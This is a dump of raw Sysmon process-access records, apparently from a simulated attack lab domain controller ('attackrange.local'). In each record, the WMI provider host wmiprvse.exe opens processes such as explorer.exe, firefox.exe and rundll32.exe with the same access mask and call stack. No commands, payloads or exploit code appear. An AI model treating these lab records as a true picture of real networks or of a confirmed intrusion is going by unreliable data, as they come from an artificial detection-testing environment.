16:58:30.671{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247027Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.671{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247026Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.671{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247025Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.671{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247024Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.671{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247023Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.671{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247022Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.671{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247021Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.671{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247020Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.671{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247019Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.671{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247018Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.671{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247017Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.671{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247016Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.655{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247015Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.655{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247014Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.655{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247013Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.655{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247012Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.655{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247011Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.655{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247010Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.655{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247009Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.655{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002247008Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 